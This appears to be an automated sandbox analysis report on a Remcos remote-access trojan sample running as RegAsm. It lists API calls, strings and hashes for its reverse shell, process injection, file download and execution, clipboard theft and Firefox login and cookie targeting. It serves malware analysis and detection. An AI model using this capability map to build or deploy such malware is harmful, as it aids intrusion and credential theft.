                              • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                              • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                              • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                              • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                              • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                              • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                              • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                              • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                            • String ID:
                            • API String ID: 1170566393-0
                            • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                            • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                            • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                            • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                            APIs
                              • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                            • String ID:
                            • API String ID: 806969131-0
                            • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                            • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                            • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                            • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                            APIs
                              • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                            • String ID:
                            • API String ID: 806969131-0
                            • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                            • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                            • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                            • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                            APIs
                              • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                              • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418174
                              • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                              • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418188
                              • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                              • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 0041819C
                              • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                              • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 004181B0
                              • Part of subcall function 0041812A: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                              • Part of subcall function 0041812A: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                            • CloseHandle.KERNEL32(004040F5), ref: 004185B9
                            • CloseHandle.KERNEL32(00465E84), ref: 004185C2
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                            • String ID:
                            • API String ID: 2948481953-0
                            • Opcode ID: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                            • Instruction ID: c73268819cb60d4ae5e82c4b87b0b0ed6d20300d6cd2269ac6e8254bb02e1260
                            • Opcode Fuzzy Hash: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                            • Instruction Fuzzy Hash: 4FD05E76C4120CFFCB006BA4AC0E8AEB77CFB09211B50116AEC2442252AA369D188A64
                            APIs
                            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: __crt_fast_encode_pointer
                            • String ID:
                            • API String ID: 3768137683-0
                            • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                            • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                            • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                            • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                            • Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
                            • Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                            • Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: __alldvrm
                            • String ID:
                            • API String ID: 65215352-0
                            • Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                            • Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
                            • Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                            • Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                            • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                            • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                            • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                            APIs
                            • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Startup
                            • String ID:
                            • API String ID: 724789610-0
                            • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                            • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                            • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                            • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                            APIs
                            • std::_Deallocate.LIBCONCRT ref: 00402E2B
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Deallocatestd::_
                            • String ID:
                            • API String ID: 1323251999-0
                            • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                            • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                            • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                            • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: recv
                            • String ID:
                            • API String ID: 1507349165-0
                            • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                            • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                            • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                            • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: send
                            • String ID:
                            • API String ID: 2809346765-0
                            • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                            • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                            • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                            • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                            APIs
                            • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                            • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                            • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                            • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
                            APIs
                            • SetEvent.KERNEL32(?,?), ref: 00407CF4
                            • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                            • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                              • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C37D
                              • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C3AD
                              • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C402
                              • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C463
                              • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C46A
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                              • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                              • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                            • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                            • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                            • DeleteFileA.KERNEL32(?), ref: 0040868D
                              • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                              • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                              • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                              • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                            • Sleep.KERNEL32(000007D0), ref: 00408733
                            • StrToIntA.SHLWAPI(00000000), ref: 00408775
                              • Part of subcall function 0041CA73: SystemParametersInfoW.USER32 ref: 0041CB68
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                            • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                            • API String ID: 1067849700-181434739
                            • Opcode ID: 36c4c716138eafb65366924a739a3da03ec63e0fe725df44d5f022929fa74a77
                            • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                            • Opcode Fuzzy Hash: 36c4c716138eafb65366924a739a3da03ec63e0fe725df44d5f022929fa74a77
                            • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                            APIs
                            • __Init_thread_footer.LIBCMT ref: 004056E6
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            • __Init_thread_footer.LIBCMT ref: 00405723
                            • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                            • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                            • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                              • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                            • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                            • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                            • CloseHandle.KERNEL32 ref: 00405A23
                            • CloseHandle.KERNEL32 ref: 00405A2B
                            • CloseHandle.KERNEL32 ref: 00405A3D
                            • CloseHandle.KERNEL32 ref: 00405A45
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                            • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                            • API String ID: 2994406822-18413064
                            • Opcode ID: b423d8e08fb893e8383836c5af32858413a78b929626fa58ba14b24f70300a4b
                            • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                            • Opcode Fuzzy Hash: b423d8e08fb893e8383836c5af32858413a78b929626fa58ba14b24f70300a4b
                            • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                            APIs
                            • GetCurrentProcessId.KERNEL32 ref: 00412141
                              • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                              • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                              • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                            • OpenMutexA.KERNEL32 ref: 00412181
                            • CloseHandle.KERNEL32(00000000), ref: 00412190
                            • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                            • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$`.S$fsutil.exe$rmclient.exe$svchost.exe
                            • API String ID: 3018269243-4205388774
                            • Opcode ID: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                            • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                            • Opcode Fuzzy Hash: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                            • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                            APIs
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                            • FindClose.KERNEL32(00000000), ref: 0040BC04
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                            • FindClose.KERNEL32(00000000), ref: 0040BD4D
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$CloseFile$FirstNext
                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                            • API String ID: 1164774033-3681987949
                            • Opcode ID: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                            • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                            • Opcode Fuzzy Hash: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                            • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                            APIs
                            • OpenClipboard.USER32 ref: 004168FD
                            • EmptyClipboard.USER32 ref: 0041690B
                            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                            • GlobalLock.KERNEL32 ref: 00416934
                            • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                            • SetClipboardData.USER32 ref: 00416973
                            • CloseClipboard.USER32 ref: 00416990
                            • OpenClipboard.USER32 ref: 00416997
                            • GetClipboardData.USER32 ref: 004169A7
                            • GlobalLock.KERNEL32 ref: 004169B0
                            • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                            • CloseClipboard.USER32 ref: 004169BF
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                            • String ID: !D@
                            • API String ID: 3520204547-604454484
                            • Opcode ID: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                            • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                            • Opcode Fuzzy Hash: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                            • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                            APIs
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                            • FindClose.KERNEL32(00000000), ref: 0040BE04
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                            • FindClose.KERNEL32(00000000), ref: 0040BEEA
                            • FindClose.KERNEL32(00000000), ref: 0040BF0B
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$Close$File$FirstNext
                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                            • API String ID: 3527384056-432212279
                            • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                            • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                            • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                            • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
